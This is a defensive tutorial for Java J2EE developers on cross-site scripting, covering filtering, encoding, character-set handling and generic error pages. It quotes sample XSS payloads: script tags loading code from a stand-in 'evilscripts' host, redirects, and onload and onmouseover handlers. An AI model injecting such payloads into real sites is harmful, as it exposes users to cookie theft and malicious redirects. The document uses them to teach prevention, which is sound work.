Cross Site Scripting Java Input Validation
16.09.2007
This is the second article in a series on handling Java web application input. In part one, I talked about validation best practices and SQL injection attacks. In this article, I will continue the theme, and in particular will talk about the threat of cross-site scripting, as well as looking at correctly handling exceptions in J2EE web applications.
Cross-Site Scripting
Cross-site scripting, also known as XSS, is an attack against dynamic applications. It occurs when an application ignorantly accepts input containing units of instruction from an external source. This input is then sent as part of the response to a delivery medium such as a web browser, and may also be persisted to a data store for future display. The success of such an attack is heavily dependent on a web browser's facility to discern regular content from instruction: markup and data. Let us consider a simple example, shown in Figure 1, that allows the posting of movie reviews.

Figure 1 shows a web page that allows a user to post a movie review. Let us consider what would happen if a movie review was posted containing some JavaScript code:
<script> alert("Hello Script Injection"); </script>
The possible result of this is shown in Figure 2.

Figure 2. Script injection attack
As you can see, this input results in the script being executed any time a user requests the web page. In this case, it displays a harmless alert window. An attacker initiates this attack by interacting with the application, passing data through HTML form input fields. This data is then sent to the web server via an HTTP POST request. On receipt, the web server passes this request to the J2EE web container, which in turn parses the HTTP request to extract pertinent data: HTTP headers, request data, referrer URL, etc. This data is then used to construct a javax.servlet.http.HttpServletRequest that provides a programmer-friendly interface to this data. This object is then used to retrieve the movie data, performing simple validation to ensure required data has been set.
The problem with this approach is that the validation employed does not protect against an XSS attack, because the input data may contain characters that are considered special under the HTML specification. The HTML 4.0 specification includes around 250 special characters. However, in relation to an XSS attack, commonly used characters include <, >, &, {, }, [, ], and %. An attacker can use these characters and others to construct a series of attack strings that the receiving web browser will interpret as units of instruction and execute accordingly.
Now consider the following tag:
<script type="text/javascript" src="http://evilscripts/js/evilScript.js" />
This results in the malicious script evilScript.js being downloaded and executed. A similar attack looks like this:
<script type="text/javascript">
location.href="http://evilscripts/js/evilScriptPage.html";
</script>
The result of this would be the user being redirected to evilScriptPage.html on every load of the page.
An anchor can hide a script, too:
<A HREF="http://evilscripts.com/evilScriptPage.html?script=
<SCRIPT SRC='http://evilscripts/js/evilScript.js'></SCRIPT>">
Go to Movies web site</A>
This is a link that sends a user to http://evilscripts.com/evilScriptPage.html and executes the evilScript.js script.
There are also "inline" script attacks, which work in newer browsers.
<body onload="javascript:alert('Hello Inline Script Attack');">
Finally, there are attacks that launch when the user mouses over them:
<img
onmouseover="location.href='http://evilscripts/js/evilScriptPage.html';"
src="images/example.gif" id="example"
width="482" height="297" alt="example" />
This is an image that redirects a user to http://evilscripts/js/evilScriptPage.html when the mouse is placed over the image.
Tags that Allow for Cross-Site Scripting
Common exploits include the use of
<script>, <applet>,
<object>, <embed>,
and standard HTML tags.
| Tag | Description |
|---|---|
| <APPLET> | Used to embed a Java applet in a document. This tag is deprecated in HTML 4.0 in favor of the object tag. |
| <EMBED> | Adds an object to a document. Commonly used to add multimedia (an applet, ActiveX control, or Flash or sound files) to your HTML page. |
| <OBJECT> | Defines an embedded object. Use this element to add multimedia (an applet, ActiveX control, etc.) to your HTML page. This element allows you to specify the data and parameters for objects inserted into HTML documents, and the code that can be used to display/manipulate that data. |
| <SCRIPT> | Defines an executable script, such as JavaScript or VBScript. Code within this element is executed immediately when a page is loaded, unless it is inside a function or runs in response to an event. Example: <script type="text/javascript">document.write("Hello JavaScript!") </script> Output: Writes "Hello JavaScript!" to the web page. |
A script injection attack does not necessarily have to be initiated with malicious intent. For example, a well-meaning user could enter standard HTML markup and alter page formatting, seriously defacing the look of a website.
Threats Of Cross-Site Scripting
The exploits achieved through script injection vary across a large spectrum. This is due to the nature of the attack: any website that lets an attacker insert instructions into a web page opens the application up to a variety of attacks with serious ramifications. An exploit is heavily dependent on the environment in which the malicious code executes, such as the privileges granted to the account under which the application runs and the programming language used. Some common exploits achieved through cross-site scripting include:
- The attacker can steal cookies by inserting a script into a web page of a vulnerable website. This script collects user cookies and then sends them to the attacker. The attacker can then impersonate a user (which is particularly dangerous in a single sign-on environment), possibly gaining access to sensitive data such as credit card numbers and passwords.
- The attacker can insert a malicious link into a popular website, usually encoding it to make it difficult to discern from a well-meaning link; when a user clicks on the link, a malicious script is executed. A link could also be used to redirect a user to a malicious web page that takes on the appearance of a trusted site, possibly requesting security credentials.
- User input may be intercepted. An attacker could write a script that monitors user input and sends sensitive data back to the attacker.
- An attacker can trick the web server into executing malicious code in the same context as trusted code. This can give the attacker access to the web server and possibly, network access.
- An attacker can deface a website, rendering it unreadable or adding any content they see fit.
- An attacker can use the application logger to inject malicious input into the application. This input can be executed if logs are viewed in HTML form. Therefore, a good security practice is to wrap the application logger using a custom implementation that filters malicious input.
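The logger wrapper suggested in the last item could look something like the following. This is only a minimal sketch, assuming java.util.logging as the underlying logger; the class name SafeLogger and its methods are hypothetical and not part of any library. It escapes HTML markup characters so that a log viewed in a browser shows the text rather than executing it, and it replaces line breaks with visible markers so that an attacker cannot forge extra log entries.

```java
import java.util.logging.Level;
import java.util.logging.Logger;

/** Hypothetical wrapper that neutralizes untrusted text before it is logged. */
final class SafeLogger {
    private final Logger delegate;

    SafeLogger(Logger delegate) {
        this.delegate = delegate;
    }

    /** Escapes HTML markup characters and replaces line breaks with visible markers. */
    static String sanitize(String message) {
        if (message == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(message.length());
        for (int i = 0; i < message.length(); i++) {
            char c = message.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                case '\r': out.append("\\r");    break; // literal backslash-r
                case '\n': out.append("\\n");    break; // literal backslash-n
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Logs an untrusted message at WARNING level after sanitizing it. */
    void warning(String untrustedMessage) {
        delegate.log(Level.WARNING, sanitize(untrustedMessage));
    }
}
```

A caller would wrap its existing logger once, for example new SafeLogger(Logger.getLogger("movies")), and route any message that contains request data through it.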
Preventing Cross-Site Scripting
One approach to achieving prevention is to configure the web browser to disable scripting. Unfortunately, this is not always a viable option as it affects functionality and, worse, relies on autonomous configuration. Therefore we need to plug in some validation code. However, before banging out any code, it is important to understand that an attacker will take measures to evade any validation code, testing for the possibility of dangerous special characters. This will normally be carried out by using numeric character references such as hexadecimal and decimal, or character entity references of special characters for a particular character encoding, like the following:
| Char | < | > | " | : | { | } | [ | ] | ; |
|---|---|---|---|---|---|---|---|---|---|
| Hex Char Code | %3c | %3e | %22 | %3a | %7b | %7d | %5b | %5d | %3b |
In order to be able to detect special characters, it is vital that the web server explicitly set the character set of any web page. If the character set is not explicitly set in the HTML output, an attacker can set a different character set. An attacker can then pass malicious content containing special characters in a different encoding, which the validation code cannot recognize, rendering it ineffective. The character set of a web page can be set by specifying the meta tag in the head section of an HTML page:
<HEAD>
<META http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1">
</HEAD>
The above declaration sets the character set to ISO-8859-1 (Latin-1), which covers Western European languages. When writing validation code, it is important to be aware of what character set is being used in order to correctly recognize special characters.
Once this is set, the next step is to craft some validation code. When writing this code, it is critical to understand that every application is different (different internationalization requirements, etc.) and secure coding practices that protect one application may not protect another. Therefore, before writing any code, it is important to play the role of the attacker, looking for any entry points from which data is input from an unknown source. Once these points have been identified, it is important to construct attack strings in order to understand how your application can be exploited. When it comes to writing validation code, there are two main choices: filtering and encoding.
Filtering
The safest and perhaps most performant method of protecting against attack is to accept only data that is deemed valid and reject everything else, possibly returning an error to the client. For example, if the input data is expected to be numeric, then ensure that this is the case by rejecting any input that is not.
final String inputStr = request.getParameter("input");
final String numericPattern = "^\\d+$";
/* getParameter returns null when the parameter is missing */
if (inputStr == null || !inputStr.matches(numericPattern))
{
    /* invalid input, do something with error */
}
Although this is the best form of prevention and would work well for the movie review example, it may not be practical to reject all data. In this case, a cleaning routine can be used, which checks for the existence of special characters and replaces each with another character, such as a space.
/* regular expression that
 * matches malicious characters so that
 * each one can be replaced with a space.
 * inputStr is the request parameter read earlier. */
final String filterPattern = "[<>{}\\[\\];&]";
final String cleanStr = inputStr.replaceAll(filterPattern, " ");
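The two filtering strategies described above, rejecting anything outside a known-good set and cleaning special characters, can be sketched together for the movie review form. This is an illustration under stated assumptions rather than a definitive rule set: the class name ReviewFilter, the permitted punctuation, and the 500-character limit are all hypothetical choices that a real application would need to adapt to its own requirements.

```java
import java.util.regex.Pattern;

/** Hypothetical input filter for the movie review form. */
final class ReviewFilter {
    // Whitelist (assumed policy): letters, digits, whitespace and a little
    // punctuation, between 1 and 500 characters in total.
    private static final Pattern ALLOWED =
            Pattern.compile("[\\p{L}\\p{N}\\s.,!?'()-]{1,500}");

    // Characters the cleaning routine replaces with a space.
    private static final Pattern SPECIAL = Pattern.compile("[<>{}\\[\\];&%\"]");

    /** Returns true only if the whole input consists of permitted characters. */
    static boolean isValid(String input) {
        return input != null && ALLOWED.matcher(input).matches();
    }

    /** Replaces each special character with a space; null becomes an empty string. */
    static String clean(String input) {
        return input == null ? "" : SPECIAL.matcher(input).replaceAll(" ");
    }
}
```

Rejecting with isValid is the stricter option. The clean method is the fallback for cases where refusing the input outright is not practical, at the cost of altering what the user typed.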
Encoding
In certain situations, it is not viable to reject certain input. For example, consider an online forum that allows programmers to post code. If code is filtered, it will not display correctly, making messages difficult to understand. In this case, we cannot apply filtering and need an alternative approach.
One such approach is to encode the data. Encoding transforms harmful characters into their display equivalents by using character entity references or numeric character references. For example, < and > will be transformed into &lt; and &gt; respectively. However, when applying this approach, it is important to set the character set of the response, as shown earlier. This is needed because of the way in which the web server and the web browser interact when sending data over the wire. When a web server needs to send characters to a browser, it needs to convert them into a series of bytes. When the browser receives these bytes, it needs to convert them back into a stream of characters. The charset parameter of the Content-Type header specifies how this conversion is done. Likewise, when you write dynamic content using a JSP or in a servlet using response.getWriter(), the web container converts strings into bytes using the specified character set. When encoding is used, the character references generated by the encoding routine are sent over the wire as byte sequences determined by the particular character set. If the character set is not set, the web browser may use a different character set to transform the received bytes into a character stream. Because different character sets use different byte sequences to represent characters, encoded characters may be transformed back into special characters during this conversion, which destroys your encoding efforts.
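The byte conversion described above can be observed without a browser. The following minimal sketch (the class CharsetMismatchDemo and the method transmit are hypothetical names chosen for illustration) encodes a string with one character set, as a server would, and decodes the resulting bytes with another, as a browser that guessed wrongly would.

```java
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;

/** Hypothetical demonstration of a server/browser character set mismatch. */
final class CharsetMismatchDemo {
    /** Converts text to bytes with one charset and back to text with another. */
    static String transmit(String text, Charset serverCharset, Charset browserCharset) {
        byte[] wire = text.getBytes(serverCharset);  // what the server sends
        return new String(wire, browserCharset);     // what the browser reconstructs
    }
}
```

When both sides use UTF-8, the string "caf\u00e9" survives the round trip unchanged. When the bytes are written as UTF-8 but read as ISO-8859-1, the final character arrives as two different characters. In a servlet, the character set is normally declared by calling response.setContentType("text/html; charset=ISO-8859-1") before response.getWriter() is obtained.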
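The following simple routine encodes any input passed to it for display in a web browser, replacing every character with its decimal character reference:
public static String encode(String data)
{
    final StringBuilder buf = new StringBuilder();
    final char[] chars = data.toCharArray();
    for (int i = 0; i < chars.length; i++)
    {
        // a numeric character reference has the form &#NNN;
        buf.append("&#").append((int) chars[i]).append(';');
    }
    return buf.toString();
}
For example, passing:
<script> alert("Hello Script Injection"); </script>
is transformed into:
&#60;&#115;&#99;&#114;&#105;&#112;&#116;
&#62;&#32;&#97;&#108;&#101;&#114;&#116;
&#40;&#34;&#72;&#101;&#108;&#108;&#111;
&#32;&#83;&#99;&#114;&#105;&#112;&#116;
&#32;&#73;&#110;&#106;&#101;&#99;&#116;
&#105;&#111;&#110;&#34;&#41;&#59;&#32;
&#60;&#47;&#115;&#99;&#114;&#105;&#112;
&#116;&#62;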
This enables the browser to treat it as a harmless string and not as executable content. The JSP Standard Tag Library (JSTL) provides similar functionality through its standard <c:out> tag, which encodes various HTML special characters using character entity references. An important consideration when using encoding is that it can incur a performance penalty. Furthermore, as stated earlier, an attacker may enter a different representation of special characters when sending the data to the server (such as using a hexadecimal representation). As a result, data should be decoded before encoding it.
import java.io.UnsupportedEncodingException;

/* Decodes %XX hexadecimal escapes in data, using charEncoding to convert
 * between characters and bytes. Malformed escapes are copied unchanged. */
public static String decodeHex(final String data,
        final String charEncoding)
{
    if (data == null)
    {
        return null;
    }
    byte[] inBytes;
    try
    {
        inBytes = data.getBytes(charEncoding);
    }
    catch (UnsupportedEncodingException e)
    {
        // unknown charset name: fall back to the platform default
        inBytes = data.getBytes();
    }
    final byte[] outBytes = new byte[inBytes.length];
    int j = 0;
    for (int i = 0; i < inBytes.length; i++)
    {
        // only treat '%' as an escape when two hex digits follow it
        if (inBytes[i] == '%' && i + 2 < inBytes.length)
        {
            final int b1 = Character.digit((char) inBytes[i + 1], 16);
            final int b2 = Character.digit((char) inBytes[i + 2], 16);
            if (b1 >= 0 && b2 >= 0)
            {
                outBytes[j++] = (byte) ((b1 << 4) + b2);
                i += 2;
                continue;
            }
        }
        outBytes[j++] = inBytes[i];
    }
    try
    {
        return new String(outBytes, 0, j, charEncoding);
    }
    catch (UnsupportedEncodingException e)
    {
        return new String(outBytes, 0, j);
    }
}
The above code is used to decode any hexadecimal-encoded characters. It accepts a string containing the data to decode, along with the name of the character set used to decode the data (such as UTF-8, ISO-8859-1, etc.).
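To show the "decode, then encode" order end to end, here is a minimal sketch. Note that it swaps in the standard library's java.net.URLDecoder for the hand-written decoder above, and encodes with character entity references rather than numeric ones; the class name OutputEncoder and its method are hypothetical. URLDecoder also converts + to a space and may throw IllegalArgumentException on malformed escapes such as a trailing %, so it is only suitable for input that is expected to be percent-encoded.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;

/** Hypothetical helper: decode percent-escapes first, then entity-encode for HTML output. */
final class OutputEncoder {
    static String decodeThenEncode(String data, String charEncoding) {
        if (data == null) {
            return "";
        }
        final String decoded;
        try {
            // Step 1: turn %3c, %3e, %22 ... back into the characters they hide.
            decoded = URLDecoder.decode(data, charEncoding);
        } catch (UnsupportedEncodingException e) {
            throw new IllegalArgumentException("Unknown charset: " + charEncoding, e);
        }
        // Step 2: replace HTML special characters with entity references.
        StringBuilder out = new StringBuilder(decoded.length());
        for (int i = 0; i < decoded.length(); i++) {
            char c = decoded.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```

Encoding without the decoding step would leave a value such as %3cscript%3e untouched, since it contains no special characters until it is decoded. Keep in mind that a servlet container has usually decoded request parameters once already, so whether a second decoding pass is appropriate depends on where the data comes from.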
An important decision is where to apply the validation techniques. The two main places where this is commonly done are on receipt of the request and when writing the response. It is generally a good idea to apply both, although the exact split will depend on the specific requirements of the application. Any input data should be validated on receipt, ensuring that it is of the required type whenever possible. Encoding should be performed when writing the response, because data does not necessarily have to be input via the web application: it can enter an application through a number of different routes, such as logging or direct entry into a database. A good practice for doing this in a JSP page is to use a custom tag.
Error Reporting
During the process of conducting an attack, an attacker will usually pass some input that will result in a web server returning an error. A poorly designed error-handling infrastructure will allow an attacker to learn more about the system they are trying to exploit. An attacker can use this newfound knowledge to trigger a stronger attack the next time around. Therefore, it is critical to limit the information returned.
A best practice for handling this kind of
situation is to return a generic error
message to the client and log the error,
including any resultant exceptions and the
corresponding stack traces, to the
application log file, possibly emailing a
system administrator if persistent error
conditions occur. A J2EE-compliant web
container provides a nice fit for this
scenario, using declarative error handling
through the error-page element
of the application deployment descriptor
web.xml. The error-page
element allows you to map HTTP response
codes (such as 500 Internal Server Error and
404 Not Found), as well as thrown
exceptions, to a specific error-handling
page:
<!-- Maps the 404 Not Found response code
     to the error page /errPage404 -->
<error-page>
    <error-code>404</error-code>
    <location>/errPage404</location>
</error-page>
<!-- Maps any thrown ServletExceptions
     to the error page /errPageServ -->
<error-page>
    <exception-type>javax.servlet.ServletException</exception-type>
    <location>/errPageServ</location>
</error-page>
<!-- Maps any other thrown exceptions
     to a generic error page /errPageGeneric -->
<error-page>
    <exception-type>java.lang.Throwable</exception-type>
    <location>/errPageGeneric</location>
</error-page>
The <location> element is used to specify the resource (servlet, JSP, etc.) that will handle an error when thrown, the <error-code> element specifies the error code to be handled, and the <exception-type> element specifies the exception to be handled. For instance, in the above example, any error that is sent with the error code 404 will be intercepted by the web container and forwarded to the resource located at /errPage404. Likewise, any thrown javax.servlet.ServletException will be forwarded to /errPageServ, and any exception that is not an instance of javax.servlet.ServletException will be forwarded to /errPageGeneric. The exception and error code can be retrieved by a servlet handling the error using:
Throwable throwable = (Throwable)
    request.getAttribute("javax.servlet.error.exception");
/* String.valueOf avoids a NullPointerException if the attribute is absent */
String statusCode = String.valueOf(
    request.getAttribute("javax.servlet.error.status_code"));
The error details can then be logged to a log file, and a generic error message can be returned to the client that contains no specific error details or stack traces that would aid an attacker.
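The split between what is logged and what is returned can be sketched independently of the servlet API. In the following illustration, the class ErrorReporter, its report method, and the idea of quoting a random reference ID are assumptions made for the example. In an error-handling servlet, the Throwable and status code would come from the request attributes shown above.

```java
import java.util.UUID;
import java.util.logging.Level;
import java.util.logging.Logger;

/** Hypothetical helper: full details go to the log, a generic message goes to the client. */
final class ErrorReporter {
    private static final Logger LOG = Logger.getLogger(ErrorReporter.class.getName());

    /** Logs the error with its stack trace and returns a message that reveals nothing about it. */
    static String report(Throwable error, Integer statusCode) {
        // A random reference lets support staff find the log entry
        // without exposing any internal detail to the client.
        String incidentId = UUID.randomUUID().toString();
        LOG.log(Level.SEVERE,
                "Incident " + incidentId + " (status " + statusCode + ")", error);
        return "An unexpected error occurred. Please quote reference "
                + incidentId + " when contacting support.";
    }
}
```

The returned string is the only thing written to the response. The exception class, message, and stack trace stay in the server-side log.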
Conclusion
In this series, we looked at the importance of handling application input correctly. In particular, we looked at validation best practices as well as the threats of SQL injection and cross-site scripting. It is hoped that these articles have provided a good starting point for J2EE developers, helping them to understand and appreciate the seriousness of the very real and dangerous threat posed by inadequate data validation. The appearance of automated tools and the incorporation of new features into the various specifications and web browsers have resulted in attackers finding new and innovative ways to exploit an application through application input. An attacker can initiate an attack through a web browser by constructing attack strings, sending them via an HTTP GET request through URL tampering, via an HTTP POST request through HTML forms, or by other means. It is therefore critical that every route by which data can enter an application from an external source is carefully analyzed, and that secure coding practices are put in place to meet the specific validation needs of the application in order to neutralize any threats.